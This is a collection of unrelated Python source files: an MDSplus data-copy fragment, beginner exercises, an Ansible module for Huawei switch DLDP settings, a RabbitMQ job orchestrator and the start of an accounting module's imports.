myTree.getNode('gpi_tcv.apd_array.hardware.acq132_'+str(j)+'.input_0'+str(k)).putData(myTree.tdiCompile(str(a[0:2000]))) else: a=Tree('spectroscopy',s_old+i).getNode('gpi_tcv.apd_array.hardware.acq132_'+str(j)+'.input_'+str(k)).getData().data().tolist() myTree.getNode('gpi_tcv.apd_array.hardware.acq132_'+str(j)+'.input_'+str(k)).putData(myTree.tdiCompile(str(a[0:2000]))) for j in range (1,33): if j<10: a=Tree('spectroscopy',s_old+i).getNode('gpi_tcv.apd_array.hardware.acq196.input_0'+str(j)).getData().data().tolist() myTree.getNode('gpi_tcv.apd_array.hardware.acq196.input_0'+str(j)).putData(myTree.tdiCompile(str(max(a)))) else: a=Tree('spectroscopy',s_old+i).getNode('gpi_tcv.apd_array.hardware.acq196.input_'+str(j)).getData().data().tolist() myTree.getNode('gpi_tcv.apd_array.hardware.acq196.input_'+str(j)).putData(myTree.tdiCompile(str(max(a)))) for j in range 
(1,9): a=Tree('spectroscopy',s_old+i).getNode('gpi_tcv.apd_array.control.hv_prog_'+str(j)).getData().data() myTree.getNode('gpi_tcv.apd_array.control.hv_prog_'+str(j)).putData(myTree.tdiCompile(str(a))) myTree.close() #close the tree modelTree.close() #close the tree <reponame>GuilhermoCampos/Curso-Python3-curso-em-video n1 = int(input('Digite um número para ver sua tabuada: ')) i = n1 * int(1) II = n1 * int(2) III = n1 * int(3) IV = n1 * int(4) V = n1 * int(5) VI = n1 * int(6) VII = n1 * int(7) VIII = n1 * int(8) IX = n1 * int(9) X = n1 * int(10) print('A tabuada de {} é '.format(n1)) print('1x={} 2x={} 3x={}'.format(i, II, III)) print('4x={} 5x={} 6x={}'.format(IV, V, VI)) print('7x={} 8x={} 9x={}'.format(VII, VIII, IX)) print('10x={}'.format(X)) <filename>py/10.py import primes, os sum = 0 for i in range(0, 2000000): if i % 2 == 1 and primes.isPrime(i): sum = sum + i print(i) os.system("clear") print(sum) <gh_stars>1-10 #!/usr/bin/python # # This file is part of Ansible # # Ansible is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # Ansible is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with Ansible. If not, see <http://www.gnu.org/licenses/>. # ANSIBLE_METADATA = {'metadata_version': '1.1', 'status': ['preview'], 'supported_by': 'community'} DOCUMENTATION = ''' --- module: ce_dldp version_added: "2.4" short_description: Manages global DLDP configuration on HUAWEI CloudEngine switches. description: - Manages global DLDP configuration on HUAWEI CloudEngine switches. author: - <NAME> (@QijunPan) notes: - The relevant configurations will be deleted if DLDP is disabled using enable=disable. - When using auth_mode=none, it will restore the default DLDP authentication mode. By default, DLDP packets are not authenticated. - By default, the working mode of DLDP is enhance, so you are advised to use work_mode=enhance to restore defualt DLDP working mode. - The default interval for sending Advertisement packets is 5 seconds, so you are advised to use time_interval=5 to restore defualt DLDP interval. options: enable: description: - Set global DLDP enable state. choices: ['enable', 'disable'] work_mode: description: - Set global DLDP work-mode. choices: ['enhance', 'normal'] time_internal: description: - Specifies the interval for sending Advertisement packets. The value is an integer ranging from 1 to 100, in seconds. The default interval for sending Advertisement packets is 5 seconds. auth_mode: description: - Specifies authentication algorithm of DLDP. choices: ['md5', 'simple', 'sha', 'hmac-sha256', 'none'] auth_pwd: description: - Specifies authentication password. The value is a string of 1 to 16 case-sensitive plaintexts or 24/32/48/108/128 case-sensitive encrypted characters. The string excludes a question mark (?). reset: description: - Specify whether reset DLDP state of disabled interfaces. 
choices: ['enable', 'disable'] ''' EXAMPLES = ''' - name: DLDP test hosts: cloudengine connection: local gather_facts: no vars: cli: host: "{{ inventory_hostname }}" port: "{{ ansible_ssh_port }}" username: "{{ username }}" password: "{{ password }}" transport: cli tasks: - name: "Configure global DLDP enable state" ce_dldp: enable: enable provider: "{{ cli }}" - name: "Configure DLDP work-mode and ensure global DLDP state is already enabled" ce_dldp: enable: enable work_mode: normal provider: "{{ cli }}" - name: "Configure advertisement message time interval in seconds and ensure global DLDP state is already enabled" ce_dldp: enable: enable time_interval: 6 provider: "{{ cli }}" - name: "Configure a DLDP authentication mode and ensure global DLDP state is already enabled" ce_dldp: enable: enable auth_mode: md5 auth_pwd: <PASSWORD> provider: "{{ cli }}" - name: "Reset DLDP state of disabled interfaces and ensure global DLDP state is already enabled" ce_dldp: enable: enable reset: enable provider: "{{ cli }}" ''' RETURN = ''' proposed: description: k/v pairs of parameters passed into module returned: always type: dict sample: { "enable": "enable", "reset": "enable", "time_internal": "12", "work_mode": "normal" } existing: description: k/v pairs of existing global DLDP configration returned: always type: dict sample: { "enable": "disable", "reset": "disable", "time_internal": "5", "work_mode": "enhance" } end_state: description: k/v pairs of global DLDP configration after module execution returned: always type: dict sample: { "enable": "enable", "reset": "enable", "time_internal": "12", "work_mode": "normal" } updates: description: command sent to the device returned: always type: list sample: [ "dldp enable", "dldp work-mode normal", "dldp interval 12", "dldp reset" ] changed: description: check to see if a change was made on the device returned: always type: bool sample: true ''' import copy from xml.etree import ElementTree from ansible.module_utils.basic import AnsibleModule from ansible.module_utils.network.cloudengine.ce import ce_argument_spec, set_nc_config, get_nc_config, execute_nc_action CE_NC_ACTION_RESET_DLDP = """ <action> <dldp xmlns="http://www.huawei.com/netconf/vrp" content-version="1.0" format-version="1.0"> <resetDldp></resetDldp> </dldp> </action> """ CE_NC_GET_GLOBAL_DLDP_CONFIG = """ <filter type="subtree"> <dldp xmlns="http://www.huawei.com/netconf/vrp" content-version="1.0" format-version="1.0"> <dldpSys> <dldpEnable></dldpEnable> <dldpInterval></dldpInterval> <dldpWorkMode></dldpWorkMode> <dldpAuthMode></dldpAuthMode> </dldpSys> </dldp> </filter> """ CE_NC_MERGE_DLDP_GLOBAL_CONFIG_HEAD = """ <config> <dldp xmlns="http://www.huawei.com/netconf/vrp" content-version="1.0" format-version="1.0"> <dldpSys operation="merge"> <dldpEnable>%s</dldpEnable> <dldpInterval>%s</dldpInterval> <dldpWorkMode>%s</dldpWorkMode> """ CE_NC_MERGE_DLDP_GLOBAL_CONFIG_TAIL = """ </dldpSys> </dldp> </config> """ class Dldp(object): """Manage global dldp configration""" def __init__(self, argument_spec): self.spec = argument_spec self.module = None self.init_module() # DLDP global configration info self.enable = self.module.params['enable'] or None self.work_mode = self.module.params['work_mode'] or None self.internal = self.module.params['time_interval'] or None self.reset = self.module.params['reset'] or None self.auth_mode = self.module.params['auth_mode'] self.auth_pwd = self.module.params['auth_pwd'] self.dldp_conf = dict() self.same_conf = False # state self.changed = False 
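        # Result bookkeeping: `changed` records whether a NETCONF change was
        # actually pushed, `updates_cmd` collects the equivalent CLI commands,
        # and `proposed`/`existing`/`end_state` are filled in by the get_*
        # helpers; show_result() copies all of them into `results` for
        # module.exit_json(), matching the keys documented in RETURN above.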
self.updates_cmd = list() self.results = dict() self.proposed = dict() self.existing = list() self.end_state = list() def check_config_if_same(self): """Judge whether current config is the same as what we excepted""" if self.enable and self.enable != self.dldp_conf['dldpEnable']: return False if self.internal and self.internal != self.dldp_conf['dldpInterval']: return False work_mode = 'normal' if self.dldp_conf['dldpWorkMode'] == 'dldpEnhance': work_mode = 'enhance' if self.work_mode and self.work_mode != work_mode: return False if self.auth_mode: if self.auth_mode != 'none': return False if self.auth_mode == 'none' and self.dldp_conf['dldpAuthMode'] != 'dldpAuthNone': return False if self.reset and self.reset == 'enable': return False return True def check_params(self): """Check all input params""" if (self.auth_mode and self.auth_mode != 'none' and not self.auth_pwd) \ or (self.auth_pwd and not self.auth_mode): self.module.fail_json(msg="Error: auth_mode and auth_pwd must both exist or not exist.") if self.dldp_conf['dldpEnable'] == 'disable' and not self.enable: if self.work_mode or self.reset or self.internal or self.auth_mode: self.module.fail_json(msg="Error: when DLDP is already disabled globally, " "work_mode, time_internal auth_mode and reset parameters are not " "expected to configure.") if self.enable == 'disable' and (self.work_mode or self.internal or self.reset or self.auth_mode): self.module.fail_json(msg="Error: when using enable=disable, work_mode, " "time_internal auth_mode and reset parameters are not expected " "to configure.") if self.internal: if not self.internal.isdigit(): self.module.fail_json( msg='Error: time_interval must be digit.') if int(self.internal) < 1 or int(self.internal) > 100: self.module.fail_json( msg='Error: The value of time_internal should be between 1 and 100.') if self.auth_pwd: if '?' in self.auth_pwd: self.module.fail_json( msg='Error: The auth_pwd string excludes a question mark (?).') if (len(self.auth_pwd) != 24) and (len(self.auth_pwd) != 32) and (len(self.auth_pwd) != 48) and \ (len(self.auth_pwd) != 108) and (len(self.auth_pwd) != 128): if (len(self.auth_pwd) < 1) or (len(self.auth_pwd) > 16): self.module.fail_json( msg='Error: The value is a string of 1 to 16 case-sensitive plaintexts or 24/32/48/108/128 ' 'case-sensitive encrypted characters.') def init_module(self): """Init module object""" self.module = AnsibleModule( argument_spec=self.spec, supports_check_mode=True) def check_response(self, xml_str, xml_name): """Check if response message is already succeed""" if "<ok/>" not in xml_str: self.module.fail_json(msg='Error: %s failed.' 
% xml_name) def get_dldp_exist_config(self): """Get current dldp existed configuration""" dldp_conf = dict() xml_str = CE_NC_GET_GLOBAL_DLDP_CONFIG con_obj = get_nc_config(self.module, xml_str) if "<data/>" in con_obj: return dldp_conf xml_str = con_obj.replace('\r', '').replace('\n', '').\ replace('xmlns="urn:ietf:params:xml:ns:netconf:base:1.0"', "").\ replace('xmlns="http://www.huawei.com/netconf/vrp"', "") # get global DLDP info root = ElementTree.fromstring(xml_str) topo = root.find("data/dldp/dldpSys") if not topo: self.module.fail_json( msg="Error: Get current DLDP configration failed.") for eles in topo: if eles.tag in ["dldpEnable", "dldpInterval", "dldpWorkMode", "dldpAuthMode"]: if eles.tag == 'dldpEnable': if eles.text == 'true': value = 'enable' else: value = 'disable' else: value = eles.text dldp_conf[eles.tag] = value return dldp_conf def config_global_dldp(self): """Config global dldp""" if self.same_conf: return enable = self.enable if not self.enable: enable = self.dldp_conf['dldpEnable'] if enable == 'enable': enable = 'true' else: enable = 'false' internal = self.internal if not self.internal: internal = self.dldp_conf['dldpInterval'] work_mode = self.work_mode if not self.work_mode: work_mode = self.dldp_conf['dldpWorkMode'] if work_mode == 'enhance' or work_mode == 'dldpEnhance': work_mode = 'dldpEnhance' else: work_mode = 'dldpNormal' auth_mode = self.auth_mode if not self.auth_mode: auth_mode = self.dldp_conf['dldpAuthMode'] if auth_mode == 'md5': auth_mode = 'dldpAuthMD5' elif auth_mode == 'simple': auth_mode = 'dldpAuthSimple' elif auth_mode == 'sha': auth_mode = 'dldpAuthSHA' elif auth_mode == 'hmac-sha256': auth_mode = 'dldpAuthHMAC-SHA256' elif auth_mode == 'none': auth_mode = 'dldpAuthNone' xml_str = CE_NC_MERGE_DLDP_GLOBAL_CONFIG_HEAD % ( enable, internal, work_mode) if self.auth_mode: if self.auth_mode == 'none': xml_str += "<dldpAuthMode>dldpAuthNone</dldpAuthMode>" else: xml_str += "<dldpAuthMode>%s</dldpAuthMode>" % auth_mode xml_str += "<dldpPasswords><PASSWORD>>" % self.auth_pwd xml_str += CE_NC_MERGE_DLDP_GLOBAL_CONFIG_TAIL ret_xml = set_nc_config(self.module, xml_str) self.check_response(ret_xml, "MERGE_DLDP_GLOBAL_CONFIG") if self.reset == 'enable': xml_str = CE_NC_ACTION_RESET_DLDP ret_xml = execute_nc_action(self.module, xml_str) self.check_response(ret_xml, "ACTION_RESET_DLDP") self.changed = True def get_existing(self): """Get existing info""" dldp_conf = dict() dldp_conf['enable'] = self.dldp_conf.get('dldpEnable', None) dldp_conf['time_interval'] = self.dldp_conf.get('dldpInterval', None) work_mode = self.dldp_conf.get('dldpWorkMode', None) if work_mode == 'dldpEnhance': dldp_conf['work_mode'] = 'enhance' else: dldp_conf['work_mode'] = 'normal' auth_mode = self.dldp_conf.get('dldpAuthMode', None) if auth_mode == 'dldpAuthNone': dldp_conf['auth_mode'] = 'none' elif auth_mode == 'dldpAuthSimple': dldp_conf['auth_mode'] = 'simple' elif auth_mode == 'dldpAuthMD5': dldp_conf['auth_mode'] = 'md5' elif auth_mode == 'dldpAuthSHA': dldp_conf['auth_mode'] = 'sha' else: dldp_conf['auth_mode'] = 'hmac-sha256' dldp_conf['reset'] = 'disable' self.existing = copy.deepcopy(dldp_conf) def get_proposed(self): """Get proposed result""" self.proposed = dict(enable=self.enable, work_mode=self.work_mode, time_interval=self.internal, reset=self.reset, auth_mode=self.auth_mode, auth_pwd=self.auth_<PASSWORD>) def get_update_cmd(self): """Get update commands""" if self.same_conf: return if self.enable and self.enable != self.dldp_conf['dldpEnable']: if self.enable == 
'enable': self.updates_cmd.append("dldp enable") elif self.enable == 'disable': self.updates_cmd.append("undo dldp enable") return work_mode = 'normal' if self.dldp_conf['dldpWorkMode'] == 'dldpEnhance': work_mode = 'enhance' if self.work_mode and self.work_mode != work_mode: if self.work_mode == 'enhance': self.updates_cmd.append("dldp work-mode enhance") else: self.updates_cmd.append("dldp work-mode normal") if self.internal and self.internal != self.dldp_conf['dldpInterval']: self.updates_cmd.append("dldp interval %s" % self.internal) if self.auth_mode: if self.auth_mode == 'none': self.updates_cmd.append("undo dldp authentication-mode") else: self.updates_cmd.append("dldp authentication-mode %s %s" % (self.auth_mode, self.auth_pwd)) if self.reset and self.reset == 'enable': self.updates_cmd.append('dldp reset') def get_end_state(self): """Get end state info""" dldp_conf = dict() self.dldp_conf = self.get_dldp_exist_config() dldp_conf['enable'] = self.dldp_conf.get('dldpEnable', None) dldp_conf['time_interval'] = self.dldp_conf.get('dldpInterval', None) work_mode = self.dldp_conf.get('dldpWorkMode', None) if work_mode == 'dldpEnhance': dldp_conf['work_mode'] = 'enhance' else: dldp_conf['work_mode'] = 'normal' auth_mode = self.dldp_conf.get('dldpAuthMode', None) if auth_mode == 'dldpAuthNone': dldp_conf['auth_mode'] = 'none' elif auth_mode == 'dldpAuthSimple': dldp_conf['auth_mode'] = 'simple' elif auth_mode == 'dldpAuthMD5': dldp_conf['auth_mode'] = 'md5' elif auth_mode == 'dldpAuthSHA': dldp_conf['auth_mode'] = 'sha' else: dldp_conf['auth_mode'] = 'hmac-sha256' dldp_conf['reset'] = 'disable' if self.reset == 'enable': dldp_conf['reset'] = 'enable' self.end_state = copy.deepcopy(dldp_conf) def show_result(self): """Show result""" self.results['changed'] = self.changed self.results['proposed'] = self.proposed self.results['existing'] = self.existing self.results['end_state'] = self.end_state if self.changed: self.results['updates'] = self.updates_cmd else: self.results['updates'] = list() self.module.exit_json(**self.results) def work(self): """Worker""" self.dldp_conf = self.get_dldp_exist_config() self.check_params() self.same_conf = self.check_config_if_same() self.get_existing() self.get_proposed() self.config_global_dldp() self.get_update_cmd() self.get_end_state() self.show_result() def main(): """Main function entry""" argument_spec = dict( enable=dict(choices=['enable', 'disable'], type='str'), work_mode=dict(choices=['enhance', 'normal'], type='str'), time_interval=dict(type='str'), reset=dict(choices=['enable', 'disable'], type='str'), auth_mode=dict(choices=['md5', 'simple', 'sha', 'hmac-sha256', 'none'], type='str'), auth_pwd=dict(type='str', no_log=True), ) argument_spec.update(ce_argument_spec) dldp_obj = Dldp(argument_spec) dldp_obj.work() if __name__ == '__main__': main() <filename>scripts/orchestrator.py<gh_stars>1-10 #!/usr/bin/env python from __future__ import unicode_literals from __future__ import print_function from __future__ import division from __future__ import absolute_import from builtins import open from builtins import str from future import standard_library standard_library.install_aliases() import os import sys import re import json import logging import time import socket import uuid import pprint from datetime import datetime import pika from mozart import app from pikaUtils import pika_callback log_format = ('%(levelname) -10s %(asctime)s %(name) -30s %(funcName) ' '-35s %(lineno) -5d: %(message)s') logging.basicConfig(level=logging.INFO, 
format=log_format) logger = logging.getLogger('orchestrator') logger.setLevel(logging.INFO) def getTimestamp(fraction=True): """Return the current date and time formatted for a message header.""" (year, month, day, hh, mm, ss, wd, y, z) = time.gmtime() d = datetime.utcnow() if fraction: s = "%04d%02d%02dT%02d%02d%02d.%dZ" % (d.year, d.month, d.day, d.hour, d.minute, d.second, d.microsecond) else: s = "%04d%02d%02dT%02d%02d%02dZ" % (d.year, d.month, d.day, d.hour, d.minute, d.second) return s def getFunction(funcStr, addToSysPath=None): """Automatically parse a function call string to import any libraries and return a pointer to the function. Define addToSysPath to prepend a path to the modules path.""" # check if we have to import a module libmatch = re.match(r'^((?:\w|\.)+)\.\w+\(?.*$', funcStr) if libmatch: importLib = libmatch.group(1) if addToSysPath: exec("import sys; sys.path.insert(1,'%s')" % addToSysPath) exec("import %s" % importLib) exec("reload(%s)" % importLib) # check there are args argsMatch = re.search(r'\((\w+)\..+\)$', funcStr) if argsMatch: importLib2 = argsMatch.group(1) if addToSysPath: exec("import sys; sys.path.insert(1,'%s')" % addToSysPath) exec("import %s" % importLib2) exec("reload(%s)" % importLib2) # return function return eval(funcStr) def getJobId(job_name): """Return a mozart job id.""" return '%s-%s' % (job_name, getTimestamp()) class OrchestratorClient(object): def __init__(self, connection, config, job_name, job_json, queue_name): self._connection = connection self._channel = None self._config = config self._job_json = job_json self._queue_name = queue_name self._response = {'status': None, 'job_id': None} self._callback_queue = None self._corr_id = None # get descriptive job name if 'name' in self._job_json: self._job_name = self._job_json['name'] else: self._job_name = job_name logger.info("config: %s" % self._config) def on_response(self, ch, method, props, body): """Handle response from worker.""" logger.info("on_response was called with body: %s" % body) logger.info("on_response was called with props: %s" % props) if self._corr_id == props.correlation_id: self._response = json.loads(body) logger.info("set self._response to: %s" % pprint.pformat(self._response)) if self._response['status'] in ('job-completed', 'job-failed'): # move to completed or error queue if self._response['status'] == 'job-completed': routing_key = self._config['job_completed_queue'] else: routing_key = self._config['job_error_queue'] self._channel.basic_publish(exchange='', routing_key=routing_key, body=body, properties=pika.BasicProperties( delivery_mode=2 # make message persistent ) ) self._channel.close() logger.info("closed channel to temp queue: %s" % self._callback_queue) def on_queue_declared(self, frame): """Set response handler then submit the job.""" self._callback_queue = frame.method.queue self._channel.basic_consume(self.on_response, no_ack=True, queue=self._callback_queue) # set job id self._job_json['job_id'] = getJobId(self._job_name) # set job_info time_queued = datetime.utcnow() self._job_json['job_info'] = { 'id': self._job_json['job_id'], 'job_queue': self._queue_name, 'completed_queue': self._config['job_completed_queue'], 'error_queue': self._config['job_error_queue'], 'job_status_exchange': self._config['job_status_exchange'], 'time_queued': time_queued.isoformat() + 'Z' } body = json.dumps(self._job_json) self._response['job_id'] = self._job_json['job_id'] self._corr_id = self._job_json['job_id'] self._channel.basic_publish(exchange='', 
routing_key=self._queue_name, body=body, properties=pika.BasicProperties( reply_to=self._callback_queue, correlation_id=self._corr_id, delivery_mode=2, # make message persistent )) # set status self._channel.basic_publish(exchange=self._config['job_status_exchange'], routing_key='', body=json.dumps({'job_id': self._job_json['job_id'], 'status': 'job-queued', 'timestamp': datetime.utcnow().isoformat() + 'Z', 'job': self._job_json}), properties=pika.BasicProperties( reply_to=self._callback_queue, correlation_id=self._corr_id, delivery_mode=2, # make message persistent )) def on_channel_open(self, channel): """Declare temporary anonymous queue for worker response.""" self._channel = channel self._channel.queue_declare(self.on_jobqueue_declared, self._queue_name, durable=True) def on_jobqueue_declared(self, frame): """Set response handler then submit the job.""" self._channel.queue_declare(exclusive=True, auto_delete=True, callback=self.on_queue_declared) def queue(self): """Open new channel.""" self._connection.channel(on_open_callback=self.on_channel_open) class Orchestrator(object): """ Based on the ansynchronous consumer example from the pika documentation: https://pika.readthedocs.org/en/latest/examples/asynchronous_consumer_example.html """ def __init__(self, amqp_url, config_file): """Create a new instance of the orchestrator class, passing in the AMQP URL used to connect to RabbitMQ and the json config file. :param str amqp_url: The AMQP url to connect with :param str config_file: The JSON config file """ self._url = amqp_url self._config_file = config_file self._config = json.loads(open(self._config_file).read()) self._exchange = self._config['job_status_exchange'] self._exchange_type = 'fanout' self._job_status_queues = ['job_status_response', 'job_status_log'] #self._routing_key = None self._connection = None self._channel = None self._closing = False self._consumer_tags = {} self._added_cancel_callback = False # parse config file for job configurations self._job_config_dict = {} for config in self._config['configs']: self._job_config_dict[config['job_type']] = config['job_creators'] logger.info("Starting up orchestrator using %s." % self._config_file) # append job_creators dir self._job_creators_dir = os.path.normpath( os.path.join(app.root_path, '..', 'scripts', 'job_creators' ) ) logger.info("Job creators directory: %s." % self._job_creators_dir) def create_job_callback(self, channel, method, properties, body): """Callback to handle job creation.""" # self.acknowledge_message(method.delivery_tag) logger.info('Received message # %s from %s: %s', method.delivery_tag, properties.app_id, body) # check that we have info to create jobs j = json.loads(body) if 'job_type' not in j: raise RuntimeError("Invalid job spec. No 'job_type' specified.") job_type = j['job_type'] if 'payload' not in j: raise RuntimeError("Invalid job spec. No 'payload' specified.") payload = j['payload'] logger.info("got job_type: %s" % job_type) logger.info("payload: %s" % payload) # check that we know handle to handle this job type if job_type not in self._job_config_dict: logger.info("No job configuration info for '%s'." % job_type) raise RuntimeError( "No job configuration info for '%s'." 
% job_type) # get job json and add to queues for jc in self._job_config_dict[job_type]: func = getFunction( jc['function'], addToSysPath=self._job_creators_dir) job = func(payload) logger.info("job_json: %s" % job) for queue in jc['job_queues']: self.queue_job(jc['job_name'], job, queue) def queue_job(self, job_name, job, queue): """Queue job.""" orc_client = OrchestratorClient( self._connection, self._config, job_name, job, queue) orc_client.queue() logger.info("added job_json to %s" % queue) def connect(self): """This method connects to RabbitMQ, returning the connection handle. When the connection is established, the on_connection_open method will be invoked by pika. :rtype: pika.SelectConnection """ logger.info('Connecting to %s', self._url) return pika.SelectConnection(pika.URLParameters(self._url), self.on_connection_open, stop_ioloop_on_close=False) def close_connection(self): """This method closes the connection to RabbitMQ.""" logger.info('Closing connection') self._connection.close() def add_on_connection_close_callback(self): """This method adds an on close callback that will be invoked by pika when RabbitMQ closes the connection to the publisher unexpectedly. """ logger.info('Adding connection close callback') self._connection.add_on_close_callback(self.on_connection_closed) def on_connection_closed(self, connection, reply_code, reply_text): """This method is invoked by pika when the connection to RabbitMQ is closed unexpectedly. Since it is unexpected, we will reconnect to RabbitMQ if it disconnects. :param pika.frame.Method frame: The method frame from RabbitMQ """ if self._closing: self._connection.ioloop.stop() else: logger.warning('Server closed connection, reopening: (%s) %s', reply_code, reply_text) self._connection.add_timeout(5, self.reconnect) def on_connection_open(self, unused_connection): """This method is called by pika once the connection to RabbitMQ has been established. It passes the handle to the connection object in case we need it, but in this case, we'll just mark it unused. :type unused_connection: pika.SelectConnection """ logger.info('Connection opened') self.add_on_connection_close_callback() self.open_channel() def reconnect(self): """Will be invoked by the IOLoop timer if the connection is closed. See the on_connection_closed method. """ # This is the old connection IOLoop instance, stop its ioloop self._connection.ioloop.stop() if not self._closing: # Create a new connection self._connection = self.connect() # There is now a new connection, needs a new ioloop to run self._connection.ioloop.start() def add_on_channel_close_callback(self): """This method tells pika to call the on_channel_closed method if RabbitMQ unexpectedly closes the channel. """ logger.info('Adding channel close callback') self._channel.add_on_close_callback(self.on_channel_closed) def on_channel_closed(self, channel, reply_code, reply_text): """Invoked by pika when RabbitMQ unexpectedly closes the channel. Channels are usually closed if you attempt to do something that violates the protocol, such as redeclare an exchange or queue with different paramters. In this case, we'll close the connection to shutdown the object. :param pika.frame.Method frame: The Channel.Close method frame """ logger.warning('Channel was closed: (%s) %s', reply_code, reply_text) self._connection.close() def on_channel_open(self, channel): """This method is invoked by pika when the channel has been opened. The channel object is passed in so we can make use of it. 
Since the channel is now open, we'll declare the exchange to use. :param pika.channel.Channel channel: The channel object """ logger.info('Channel opened') self._channel = channel self.add_on_channel_close_callback() self.setup_exchange(self._exchange, self._exchange_type) def setup_exchange(self, exchange_name, exchange_type): """Setup the exchange on RabbitMQ by invoking the Exchange.Declare RPC command. When it is complete, the on_exchange_declareok method will be invoked by pika. :param str|unicode exchange_name: The name of the exchange to declare """ logger.info('Declaring exchange %s of type %s', exchange_name, exchange_type) self._channel.exchange_declare(self.on_exchange_declareok, exchange_name, exchange_type, durable=True) def on_exchange_declareok(self, frame): """Invoked by pika when RabbitMQ has finished the Exchange.Declare RPC command. :param pika.Frame.Method frame: Exchange.DeclareOk response frame """ logger.info('Exchange declared') # setup completed and error queues self.setup_queue_no_cb(self._config['job_completed_queue']) self.setup_queue_no_cb(self._config['job_error_queue']) # setup job status queues for queue in self._job_status_queues: self.setup_status_queue(queue) # setup job worker queues for queue in self._config['queues']: self.setup_queue(queue) def setup_queue_no_cb(self, queue_name): logger.info('Declaring queue %s', queue_name) self._channel.queue_declare(None, queue_name, durable=True) def setup_status_queue(self, queue_name): """Setup the queue on RabbitMQ by invoking the Queue.Declare RPC command. When it is complete, the on_queue_declareok method will be invoked by pika. :param str|unicode queue_name: The name of the queue to declare. """ logger.info('Declaring status queue %s', queue_name) self._channel.queue_declare(self.on_statusqueue_declareok, queue_name, durable=True) def setup_queue(self, queue_name): """Setup the queue on RabbitMQ by invoking the Queue.Declare RPC command. When it is complete, the on_queue_declareok method will be invoked by pika. :param str|unicode queue_name: The name of the queue to declare. """ logger.info('Declaring queue %s', queue_name) self._channel.queue_declare(self.on_queue_declareok, queue_name, durable=True) def on_queue_declareok(self, frame): """Method invoked by pika when the Queue.Declare RPC call made in setup_queue has completed. In this method we will bind the queue and exchange together with the routing key by issuing the Queue.Bind RPC command. When this command is complete, the on_bindok method will be invoked by pika. :param pika.frame.Method frame: The Queue.DeclareOk frame """ queue = frame.method.queue self.start_consuming(queue) def on_statusqueue_declareok(self, frame): queue = frame.method.queue logger.info('Binding %s to %s' % (self._exchange, queue)) self._channel.queue_bind(self.on_bindok, queue, self._exchange) def add_on_cancel_callback(self): """Add a callback that will be invoked if RabbitMQ cancels the consumer for some reason. If RabbitMQ does cancel the consumer, on_consumer_cancelled will be invoked by pika. """ if not self._added_cancel_callback: logger.info('Adding consumer cancellation callback') self._channel.add_on_cancel_callback(self.on_consumer_cancelled) self._added_cancel_callback = True def on_consumer_cancelled(self, frame): """Invoked by pika when RabbitMQ sends a Basic.Cancel for a consumer receiving messages. 
:param pika.frame.Method frame: The Basic.Cancel frame """ logger.info('Consumer was cancelled remotely, shutting down: %r', frame) if self._channel: self._channel.close() def acknowledge_message(self, delivery_tag): """Acknowledge the message delivery from RabbitMQ by sending a Basic.Ack RPC method for the delivery tag. :param int delivery_tag: The delivery tag from the Basic.Deliver frame """ self._channel.basic_ack(delivery_tag) logger.info('Acknowledged message %s', delivery_tag) def on_cancelok(self, frame): """This method is invoked by pika when RabbitMQ acknowledges the cancellation of a consumer. At this point we will close the connection which will automatically close the channel if it's open. :param pika.frame.Method frame: The Basic.CancelOk frame """ logger.info('RabbitMQ acknowledged the cancellation of the consumer') self.close_connection() def stop_consuming(self): """Tell RabbitMQ that you would like to stop consuming by sending the Basic.Cancel RPC command. """ if self._channel: logger.info('Sending a Basic.Cancel RPC command to RabbitMQ') for queue in self._consumer_tags: self._channel.basic_cancel( self.on_cancelok, self._consumer_tags[queue]) def start_consuming(self, queue): """This method sets up the consumer by first calling add_on_cancel_callback so that the object is notified if RabbitMQ cancels the consumer. It then issues the Basic.Consume RPC command which returns the consumer tag that is used to uniquely identify the consumer with RabbitMQ. We keep the value to use it when we want to cancel consuming. A wrapped method is passed in as a callback pika will invoke when a message is fully received. """ self.add_on_cancel_callback() callback = pika_callback(queue)(self.create_job_callback) logger.info("Got callback for queue %s: %s" % (queue, callback)) self._consumer_tags[queue] = self._channel.basic_consume( callback, queue=queue) def on_bindok(self, frame): """Invoked by pika when the Queue.Bind method has completed. At this point we will start consuming messages by calling start_consuming which will invoke the needed RPC commands to start the process. :param pika.frame.Method frame: The Queue.BindOk response frame """ logger.info('Queue bound') def close_channel(self): """Call to close the channel with RabbitMQ cleanly by issuing the Channel.Close RPC command. """ logger.info('Closing the channel') self._channel.close() def open_channel(self): """Open a new channel with RabbitMQ by issuing the Channel.Open RPC command. When RabbitMQ responds that the channel is open, the on_channel_open callback will be invoked by pika. """ logger.info('Creating a new channel') self._connection.channel(on_open_callback=self.on_channel_open) def run(self): """Run the example consumer by connecting to RabbitMQ and then starting the IOLoop to block and allow the SelectConnection to operate. """ self._connection = self.connect() self._connection.ioloop.start() def stop(self): """Cleanly shutdown the connection to RabbitMQ by stopping the consumer with RabbitMQ. When RabbitMQ confirms the cancellation, on_cancelok will be invoked by pika, which will then closing the channel and connection. The IOLoop is started again because this method is invoked when CTRL-C is pressed raising a KeyboardInterrupt exception. This exception stops the IOLoop which needs to be running for pika to communicate with RabbitMQ. All of the commands issued prior to starting the IOLoop will be buffered but not processed. 
""" logger.info('Stopping') self._closing = True self.stop_consuming() self._connection.ioloop.start() logger.info('Stopped') def main(): amqp_url = 'amqp://guest:guest@localhost:5672/%2F' config_file = sys.argv[1] # handle rabbitMQ server being down while True: try: orch = Orchestrator(amqp_url, config_file) break except socket.error as e: logger.error("Failed to connect: %s" % str(e)) time.sleep(3) # start event loop try: orch.run() except KeyboardInterrupt: orch.stop() if __name__ == '__main__': main() <reponame>jacob22/accounting # -*- coding: utf-8 -*- from __future__ import absolute_import # Copyright 2019 Open End AB # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from bson.objectid import ObjectId import decimal import flask try: import httplib #py2 except ImportError: import http.client as httplib #py3 import payson try: import urlparse #py2 from urlparse import urljoin as urljoin import urllib from urllib import urlencode as urlencode except ImportError: from urllib.parse import urlparse #py3 from urllib.parse import urljoin as urljoin from urllib.parse import urlencode as urlencode from accounting import config import members from 